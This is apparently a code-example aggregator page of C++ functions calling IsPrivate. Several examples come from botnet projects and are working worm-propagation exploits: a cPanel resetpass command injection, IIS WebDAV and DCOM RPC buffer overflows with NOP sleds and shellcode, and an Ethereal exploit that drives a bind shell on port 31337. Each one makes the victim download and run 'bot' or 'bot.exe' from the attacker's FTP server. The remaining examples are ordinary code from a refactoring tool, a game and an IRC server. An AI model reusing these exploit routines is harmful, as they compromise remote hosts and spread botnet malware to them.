C++ (Cpp) IsPrivate示例

示例#1

0

显示文件

文件： cpanelscanner.cpp 项目： hazcod/botnets

bool CScannerCPanel::Exploit()
{	bool bRetVal=false; CString sSendBuf, sCmdBuf;
	CString sHost(m_sSocket.m_szHost); unsigned short sPort=m_sSocket.m_sPort;

	// Can't infect a host from a firewalled system, cause it needs the FTP server
	if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
		return false;

	// Connect to the server
	if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) return false;
	sCmdBuf.Format("echo${BLA}-e${BLA}open${BLA}%s${BLA}%d\\\\nuser${BLA}ftp${BLA}bla\\\\nget${BLA}bot\\\\nquit\\\\n${BLA}|${BLA}ftp${BLA}-n",
		g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
	sSendBuf.Format("GET /resetpass/?user=%%7C%%60BLA=$'\\\\x20';BLA2=$'\\\\x2F';%s%%60%%7C HTTP/1.0\r\n\r\n", sCmdBuf.CStr());
	m_sSocket.Write(sSendBuf.CStr(), sSendBuf.GetLength());
	m_sSocket.Disconnect();

	if(!m_sSocket.Connect(sHost.CStr(), sPort)) return false;
	sCmdBuf.Assign("./bot");
	sSendBuf.Format("GET /resetpass/?user=%%7C%%60BLA=$'\\\\x20';BLA2=$'\\\\x2F';%s%%60%%7C HTTP/1.0\r\n\r\n", sCmdBuf.CStr());
	m_sSocket.Write(sSendBuf.CStr(), sSendBuf.GetLength());
	m_sSocket.Disconnect();

	// Close the socket that was once funky fresh
	m_sSocket.Disconnect(); return bRetVal;
}

示例#2

0

显示文件

文件： httpscanner.cpp 项目： A-Massarella/Botnet

bool CScannerHTTP::ExploitIISWebDav(int iHTTPType, unsigned short sRet) {
	char szSCBuf[4096]; char szShellBuf[4096]; char *szReqBuf=(char*)malloc(100000);
	unsigned short ret=sRet; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=100, rt=0, r=0;

	CString sURL;

	if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
		sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
	else
		sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);

	iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
	
	// Build a buffer with the shellcode
	memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
	memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
	iSCSize=iPos; iPos=0;

	// Build the request
	memset(szReqBuf, 0, 100000);
	strcpy(szReqBuf, "SEARCH /");
	unsigned int j, i=strlen(szReqBuf); szReqBuf[i]='\x90';
	for(j=i+1; j<i+2150; j+=2) { *(unsigned short*)&szReqBuf[j]=(unsigned short)ret; } // EIP will be szReqBuf[8+2087]
	for(;j<i+65535-strlen(jumpcode);j++) szReqBuf[j]='\x90'; // The rest is padded with NOP's. RET address should point to this zone!
	memcpy(&szReqBuf[j], jumpcode, strlen(jumpcode)); // Then we skip the body of the HTTP request

	strcpy(szReqBuf+strlen(szReqBuf), " HTTP/1.1\r\n");
	sprintf(szReqBuf+strlen(szReqBuf), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", m_sSocket.m_szHost, strlen(body)+iShellSize);
	strcpy(szReqBuf+strlen(szReqBuf), body);
	memset(szReqBuf+strlen(szReqBuf), 0x01, 1);
	memset(szReqBuf+strlen(szReqBuf), 0x90, 3);
	strcpy(szReqBuf+strlen(szReqBuf), szSCBuf);
	iReqSize=strlen(szReqBuf);
	
	// Connect to the server
	if(!m_sSocket.Connect(m_sSocket.m_szHost, 80)) // Connect failed, exit
	{	free(szReqBuf); return false; }

	// Send the evil request
	if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); free(szReqBuf); return false; }
	// Read reply
	m_sSocket.RecvTO(szReqBuf, sizeof(szReqBuf), 5000);

	// Close the socket that was once funky fresh
	m_sSocket.Disconnect(); free(szReqBuf); return true; }

示例#3

0

显示文件

文件： wdscanner.cpp 项目： A-Massarella/Botnet

bool CScannerWebDav::Exploit()
{	char szSCBuf[4096]; char szShellBuf[4096];
	char *szReqBuf=(char*)malloc(100000); unsigned short ret=0xB102;
	int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=100, rt=0, r=0;

	if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
		iShellSize=setup_shellcode(webdav_shellcode, sizeof(webdav_shellcode), szShellBuf, sizeof(szShellBuf), \
			g_pMainCtrl->m_cBot.bot_ftrans_port.iValue, inet_addr(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr()), \
			WEBDAV_SHELLCODE_OFFSET_PORT, WEBDAV_SHELLCODE_OFFSET_IP, WebDavConfigSC);
	else
		iShellSize=setup_shellcode(webdav_shellcode, sizeof(webdav_shellcode), szShellBuf, sizeof(szShellBuf), \
			g_pMainCtrl->m_cBot.bot_ftrans_port.iValue, g_pMainCtrl->m_cIRC.m_lLocalAddr, \
			WEBDAV_SHELLCODE_OFFSET_PORT, WEBDAV_SHELLCODE_OFFSET_IP, WebDavConfigSC);
	
	// Build a buffer with the shellcode
	memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
	memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
	iSCSize=iPos; iPos=0;

	// Build the request
	memset(szReqBuf, 0, 100000);
	strcpy(szReqBuf, "SEARCH /");
	int j, i=strlen(szReqBuf); szReqBuf[i]='\x90';
	for(j=i+1; j<i+2150; j+=2) { memcpy(szReqBuf+j, &ret, 2);				iPos+=2; }			// EIP will be buffer[8+2087]
	for(;j<i+65535-strlen(jumpcode);j++) szReqBuf[j]='\x90';										// The rest is padded with NOP's. RET address should point to this zone!
	memcpy(szReqBuf+j, jumpcode, strlen(jumpcode));													// Then we skip the body of the HTTP request

	strcat(szReqBuf, " HTTP/1.1\r\n");
	sprintf(szReqBuf+strlen(szReqBuf), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", m_sSocket.m_szHost, strlen(body)+iShellSize);
	strcat(szReqBuf, body);
	memset(szReqBuf+strlen(szReqBuf), 0x01, 1);
	memset(szReqBuf+strlen(szReqBuf), 0x90, 3);
	memcpy(szReqBuf+strlen(szReqBuf), szSCBuf, iSCSize);
	iReqSize=strlen(szReqBuf);
	
	// Connect to the server
	if(!m_sSocket.Connect(m_sSocket.m_szHost, 80)) // Connect failed, exit
	{	free(szReqBuf); return false; }

	// Send the evil request
	if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); free(szReqBuf); return false; }
	// Read reply
	m_sSocket.RecvTO(szReqBuf, sizeof(szReqBuf), 5000);

	// Close the socket that was once funky fresh
	m_sSocket.Disconnect(); free(szReqBuf); return true; }

示例#4

0

显示文件

文件： etherealscanner.cpp 项目： A-Massarella/Botnet

bool CScannerEthereal::Exploit() {
	if(!IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && IsPrivate(m_sSocket.m_szHost)) return false;

	// We need root to exploit this cause we need to spoof packets
	if(getuid()) return false;

	ExploitInt(0); ExploitInt(1); ExploitInt(2); ExploitInt(3);
	
	CSocket sShellSocket; if(sShellSocket.Connect(m_sSocket.m_szHost, 31337)) {
		CString sCmdBuf; sShellSocket.RecvTO(sCmdBuf.GetBuffer(8192), 8192, 2000);
		sCmdBuf.Format("echo -e open %s %d\\nuser ftp bla\\nget bot\\nquit\\n | ftp -n\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sCmdBuf.Format("wget ftp://bla:bla@%s:%d/bot\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sCmdBuf.Assign("chmod 777 ./bot ; ./bla\n");
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sShellSocket.Disconnect(); return true; } else return false; }

示例#5

0

显示文件

文件： EntityInfo.cpp 项目： kit-transue/software-emancipation-discover

string CEntityInfo::getRenameCommand(symbolPtr* pSym,string newname) {
    string command;
    string selectTag = prepareQuery(etag(pSym));
    string permissionCode = "1";

    if(IsPublic(pSym)) permissionCode = "0";
    else if(IsProtected(pSym)) permissionCode = "2";
    else if(IsPrivate(pSym))   permissionCode = "3";

    switch(pSym->get_kind()) {
    case DD_MODULE:
        command="Impact:ChangeFilename " + selectTag +
                " {" + newname + "}";
        break;
    case DD_INTERFACE:
    case DD_CLASS:


        command = "Impact:ChangeClassname " + selectTag +
                  " {" + newname + "}";
        break;
    case DD_ENUM:
    case DD_UNION:
        command = "Impact:ChangeUnionEnumStructName " + selectTag +
                  " {" + newname + "}";
        break;
    case DD_FIELD:
        command = "Impact:ChangeFieldName " + selectTag +
                  " {" + newname + "} " + permissionCode;
        break;
    case DD_FUNC_DECL:
        command = "Impact:ChangeFunctionName " + selectTag +
                  " {" + newname + "}";
        break;
    case DD_TYPEDEF:
        command = "Impact:ChangeTypedefName " + selectTag +
                  " {" + newname + "}";
        break;
    case DD_MACRO:
        command = "Impact:ChangeMacroName " + selectTag +
                  " {" + newname + "}";
        break;
    case DD_TEMPLATE:
        command = "Impact:ChangeTemplateName " + selectTag +
                  " {" + newname + "}";
        break;
    case DD_VAR_DECL:
        command = "Impact:ChangeVariableName " + selectTag +
                  " {" + newname + "}";
        break;
    case DD_PACKAGE:
        command ="Impact:RenamePackage " + selectTag +
                 " { " + newname + "}";
    }
    return command;
}

示例#6

0

显示文件

文件： C4Network2Client.cpp 项目： gitMarky/openclonk

bool C4Network2Client::DoConnectAttempt(C4Network2IO *pIO)
{
	// local?
	if (isLocal()) { iNextConnAttempt = 0; return true; }
	// msg and data connected? Nothing to do
	if (getMsgConn() != getDataConn()) { iNextConnAttempt = time(nullptr) + 10; return true; }
	// too early?
	if (iNextConnAttempt && iNextConnAttempt > time(nullptr)) return true;
	// find address to try
	int32_t iBestAddress = -1;
	for (int32_t i = 0; i < iAddrCnt; i++)
		// no connection for this protocol?
		if ((!pDataConn || Addr[i].getProtocol() != pDataConn->getProtocol()) &&
		    (!pMsgConn  || Addr[i].getProtocol() != pMsgConn->getProtocol()))
			// protocol available?
			if (pIO->getNetIO(Addr[i].getProtocol()))
				// new best address?
				if (iBestAddress < 0 || AddrAttempts[i] < AddrAttempts[iBestAddress])
					iBestAddress = i;
	// too many attempts or nothing found?
	if (iBestAddress < 0 || AddrAttempts[iBestAddress] > C4NetClientConnectAttempts)
		{ iNextConnAttempt = time(nullptr) + 10; return true; }
	// save attempt
	AddrAttempts[iBestAddress]++; iNextConnAttempt = time(nullptr) + C4NetClientConnectInterval;
	auto addr = Addr[iBestAddress].getAddr();

	// try TCP simultaneous open if the stars align right
	if (addr.GetFamily() == C4NetIO::addr_t::IPv6 && // address needs to be IPv6...
	    !addr.IsLocal() && !addr.IsPrivate() &&      // ...global unicast...
	    Addr[iBestAddress].getProtocol() == P_TCP && // ...TCP,
	    !TcpSimOpenSocket &&                         // there is no previous request,
	    pParent->GetLocal()->getID() < getID())      // and make sure that only one client per pair initiates a request.
	{
		DoTCPSimultaneousOpen(pIO, C4Network2Address());
	}

	std::set<int> interfaceIDs;
	if (addr.IsLocal())
	    interfaceIDs = Network.Clients.GetLocal()->getInterfaceIDs();
	else
	    interfaceIDs = {0};
	for (auto id : interfaceIDs)
	{
	    addr.SetScopeId(id);
	    // log
	    LogSilentF("Network: connecting client %s on %s...", getName(), addr.ToString().getData());
	    // connect
	    if (pIO->Connect(addr, Addr[iBestAddress].getProtocol(), pClient->getCore()))
		return true;
	}
	return false;
}

示例#7

0

显示文件

文件： CBCClass.cpp 项目： raorn/jx_application_framework

JBoolean
CBCClass::IsInherited
	(
	const JIndex		index,
	const InheritType	inherit,
	FnAccessLevel*		access
	)
	const
{
	const JString& fnName = GetFunctionName(index);
	*access               = GetFnAccessLevel(index);

	if (!IsPrivate(*access) &&					// private
		fnName.GetFirstCharacter() != '~' &&	// dtor
		fnName != GetName())					// ctor
		{
		if (inherit == kInheritPrivate)
			{
			if (*access == kPublicAccess ||
				*access == kProtectedAccess)
				{
				*access = kPrivateAccess;
				}
			else if (*access == kQtPublicSlotAccess ||
					 *access == kQtProtectedSlotAccess)
				{
				*access = kQtPrivateSlotAccess;
				}
			}
		else if (inherit == kInheritProtected &&
				 *access == kPublicAccess)
			{
			*access = kProtectedAccess;
			}
		else if (inherit == kInheritProtected &&
				 *access == kQtPublicSlotAccess)
			{
			*access = kQtProtectedSlotAccess;
			}
		return kJTrue;
		}
	else
		{
		return kJFalse;
		}
}

示例#8

0

显示文件

文件： EntityInfo.cpp 项目： kit-transue/software-emancipation-discover

bool CEntityInfo::IsPublic(symbolPtr* pSym) {
    return !(IsProtected(pSym) || IsPrivate(pSym));
}

示例#9

0

显示文件

文件： dcom2scanner.cpp 项目： A-Massarella/Botnet

bool CScannerDCOM2::Exploit()
{	char szRecvBuf[4096], szSCBuf[4096], szLoadBuf[4096], szReqBuf[4096], szShellBuf[4096], szLoaderBuf[4096];
	int iShellSize=0, iLoaderSize=0, iPos=0, iSCSize=0, iLoadSize=0, iReqSize=0;
	char *pTemp;
	int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
	if(iHostOS==OS_UNKNOWN || iHostOS==OS_WINNT) return false;

	CString sURL;

	if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
		sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
	else
		sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);

	iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);

	iLoaderSize=encrypt_shellcode(dcom2_loader, sizeof(dcom2_loader), szLoaderBuf, sizeof(szLoaderBuf), NULL);
	
	memcpy(szLoadBuf+iPos,							dcom2_shellcode_buf,	sizeof(dcom2_shellcode_buf)		); iPos+=sizeof(dcom2_shellcode_buf);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC,			szLoaderBuf,			iLoaderSize						);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC,			dcom2_shellcode_adduser,sizeof(dcom2_shellcode_adduser)	);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR,	&dcom2_my_offsets[0].lJmpAddr,	4						);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, 	&dcom2_my_offsets[0].lTopSEH,	4						);
	iLoadSize=iPos; iPos=0;

	// Build the request
	memcpy(szReqBuf+iPos,	dcom2_request1,		sizeof(dcom2_request1)-1	); iPos+=sizeof(dcom2_request1)-1;
	memcpy(szReqBuf+iPos,	dcom2_request2,		sizeof(dcom2_request2)-1	); iPos+=sizeof(dcom2_request2)-1;
	memcpy(szReqBuf+iPos,	szLoadBuf,			iLoadSize					); iPos+=iLoadSize;
	memcpy(szReqBuf+iPos,	dcom2_request3,		sizeof(dcom2_request3)-1	); iPos+=sizeof(dcom2_request3)-1;
	memcpy(szReqBuf+iPos,	dcom2_request4,		sizeof(dcom2_request4)-1	); iPos+=sizeof(dcom2_request4)-1;
	iReqSize=iPos; iPos=0;

	pTemp=szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes
	*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iLoadSize / 2;
	*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iLoadSize / 2; pTemp=szReqBuf;
    *(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iLoadSize - 12;

    char szAssocGroup[4];

	// Connect to the server
	if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
		return false;

	// Send the bind string
	if(!m_sSocket.Write(dcom2_bindstr, sizeof(dcom2_bindstr)-1))
	{	m_sSocket.Disconnect(); return false; }
	// Read reply
	if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
	{	m_sSocket.Disconnect(); return false; }
	// Check for DCE_PKT_BINDACK
	if(szRecvBuf[2]!=DCE_PKT_BINDACK) { m_sSocket.Disconnect(); return false; }
	// Store the association group for later usage
    memcpy(szAssocGroup, szRecvBuf+20, 4);

	// Send the evil request
	if(!m_sSocket.Write(szReqBuf, iReqSize))
	{	m_sSocket.Disconnect(); return false; }
	// Read reply
	if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
	{	m_sSocket.Disconnect(); return false; }
	// Check for DCE_PKT_FAULT
	if(szRecvBuf[2]==DCE_PKT_FAULT) { m_sSocket.Disconnect(); return false; }

	// Close the socket that was once funky fresh
	m_sSocket.Disconnect(); return true;
}

示例#10

0

显示文件

文件： dcomscanner.cpp 项目： A-Massarella/Botnet

bool CScannerDCOM::Exploit()
{
	switch(m_sSocket.m_sPort)
	{
	case 135:
	case 1025:
		{
			char szRecvBuf[4096]; char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
			int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
			char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
			if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
			if(iHostOS==OS_WINNT) return false;
			
			CString sURL;

			if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
				sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
					g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
			else
				sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
					g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);

			iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
			

			// Build a buffer with the shellcode
			memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
			memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
			memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
			iSCSize=iPos; iPos=0;

			// Prepend NOPs as long as shellcode doesn't fit RPC packet format
			while(iSCSize%16!=12)
			{	char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
				memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
				memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
				memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
				iSCSize=iPos; iPos=0; free(szTemp); }

			// Set the return address
			if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
				memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
			else
				memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);

			// Build the request
			memcpy(szReqBuf+iPos,	request1,			sizeof(request1)-1			); iPos+=sizeof(request1)-1;
			memcpy(szReqBuf+iPos,	request2,			sizeof(request2)-1			); iPos+=sizeof(request2)-1;
			memcpy(szReqBuf+iPos,	szSCBuf,			iSCSize						); iPos+=iSCSize;
			memcpy(szReqBuf+iPos,	request3,			sizeof(request3)-1			); iPos+=sizeof(request3)-1;
			memcpy(szReqBuf+iPos,	request4,			sizeof(request4)-1			); iPos+=sizeof(request4)-1;
			iReqSize=iPos;

			pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
			*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iSCSize / 2;
			*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize / 2; pTemp=szReqBuf;
			*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iSCSize - 12;
			
			// Connect to the server
			if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
				return false;
			// Send the bind string
			if(!m_sSocket.Write(bindstr, sizeof(bindstr)-1)) { m_sSocket.Disconnect(); return false; }
			// Read reply
			m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000);
			// Send the evil request
			if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; }
			// Read reply
			if(!m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000)) { m_sSocket.Disconnect(); return false; }

			// Close the socket that was once funky fresh
			m_sSocket.Disconnect(); return true;
		}
		break;
	case 445:
		{
#ifdef _WIN32
			NETRESOURCEW nr; bool bRetVal=false;
			if(!ConnectViaNullSession(m_sSocket.m_szHost, &nr)) return bRetVal;
			else
			{	int iHostOS=FpHost(m_sSocket.m_szHost, FP_NP);
				if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
				char szPipePath[MAX_PATH];
				sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", m_sSocket.m_szHost);
    
				HANDLE hFile=CreateFile(szPipePath, GENERIC_WRITE|GENERIC_READ, FILE_SHARE_READ, \
					NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  
				if(hFile!=INVALID_HANDLE_VALUE)
				{	
					SendLocal("%s: connected to pipe \\\\%s\\pipe\\epmapper.", m_sScannerName.CStr(), m_sSocket.m_szHost);
					char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
					int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
					char *pTemp;

					CString sURL;

					if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
						sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
							g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
					else
						sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
							g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);

					iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
					
					// Build a buffer with the shellcode
					memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
					memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
					memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
					iSCSize=iPos; iPos=0;

					// Prepend NOPs as long as shellcode doesn't fit RPC packet format
					while(iSCSize%16!=12)
					{	char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
						memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
						memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
						memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
						iSCSize=iPos; iPos=0; free(szTemp); }

					// Set the return address
					if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
						memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
					else
						memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);

					// Build the request
					memcpy(szReqBuf+iPos,	request1,			sizeof(request1)-1			); iPos+=sizeof(request1)-1;
					memcpy(szReqBuf+iPos,	request2,			sizeof(request2)-1			); iPos+=sizeof(request2)-1;
					memcpy(szReqBuf+iPos,	szSCBuf,			iSCSize						); iPos+=iSCSize;
					memcpy(szReqBuf+iPos,	request3,			sizeof(request3)-1			); iPos+=sizeof(request3)-1;
					memcpy(szReqBuf+iPos,	request4,			sizeof(request4)-1			); iPos+=sizeof(request4)-1;
					iReqSize=iPos;

					pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
					*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iSCSize / 2;
					*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize / 2; pTemp=szReqBuf;
					*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iSCSize - 12;

					unsigned long lWritten; char *szInBuf=(char*)malloc(100000); memset(szInBuf, 0, 100000);
					// Send the bind string
					DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
					if(szInBuf[2]!=0x0C) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
					// Send the evil request
					if(!WriteFile(hFile, szReqBuf, iReqSize, &lWritten, 0)) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
					if(!ReadFile(hFile, szInBuf, 10000, &dwRead, NULL)) bRetVal=true; else bRetVal=false;
					free(szInBuf); }

				CloseHandle(hFile);
				CloseNullSession(m_sSocket.m_szHost); }
			return bRetVal;
#endif // _WIN32
		}
		break;
	default:
		return false;
		break;
	}

	return false;
}

示例#11

0

显示文件

文件： m_whois.c 项目： diegoagudo/ptlink.ircd

/*
** m_whois
**      parv[0] = sender prefix
**      parv[1] = nickname masklist
*/
int     m_whois(struct Client *cptr,
                struct Client *sptr,
                int parc,
                char *parv[])
{
  static anUser UnknownUser =
  {
    NULL,       /* next */
    NULL,       /* channel */
    NULL,       /* invited */
	NULL,		/* silence */
    NULL,       /* away */
    0,          /* last */
    1,          /* refcount */
    0,          /* joined */
    "<Unknown>"         /* server */
  };
  static char rpl_oper[] = "an IRC Operator";
  static char rpl_locop[] = "an IRC Operator - Local IRC Operator";
  static char rpl_sadmin[] = "an IRC Operator - Services Administrator";
  static char rpl_admin[] = "an IRC Operator - Server Administrator";   
  static char rpl_tadmin[] = "an IRC Operator - Technical Administrator";
  static char rpl_nadmin[] = "an IRC Operator - Network Administrator"; 
  
  Link  *lp;
  anUser        *user;
  struct Client *acptr, *a2cptr;
  aChannel *chptr;
  char  *nick, *name;
  /* char  *tmp; */
  char  *p = NULL;
  int   found, len, mlen;
  static time_t last_used=0L;
